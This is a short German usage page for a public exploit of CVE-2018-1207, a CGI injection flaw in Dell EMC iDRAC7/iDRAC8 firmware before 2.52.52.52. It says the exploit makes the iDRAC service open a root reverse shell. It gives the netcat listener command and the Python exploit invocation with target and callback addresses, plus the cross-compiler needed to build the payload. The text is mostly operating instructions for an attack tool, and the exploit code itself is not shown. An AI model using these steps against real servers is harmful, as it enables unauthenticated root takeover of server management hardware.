
Exploit für iDRAC 7 & 8 Firmware < 2.52.52.52
Exploit iDRAC 7 & 8 firmware < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, Versionen vor 2.52.52.52, enthalten eine CGI-Injection-Schwachstelle, die zur Ausführung von Remote-Code genutzt werden könnte. Ein entfernter, nicht authentifizierter Angreifer könnte möglicherweise CGI-Variablen verwenden, um Remote-Code auszuführen.
Dieser Code sollte den iDRAC-Dienst dazu veranlassen, eine Reverse-Shell als Root-Benutzer zu öffnen.
Starte deinen lokalen Listener: nc -v -l -p local_port
nc -v -l -p 5500
Führe den Exploit aus: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
Du benötigst eine installierte Version von sh4-linux-gnu-gcc, aktuell ist dies sh4-linux-gnu-gcc-11
Du kannst es mit apt install gcc-11-sh4-linux-gnu installieren.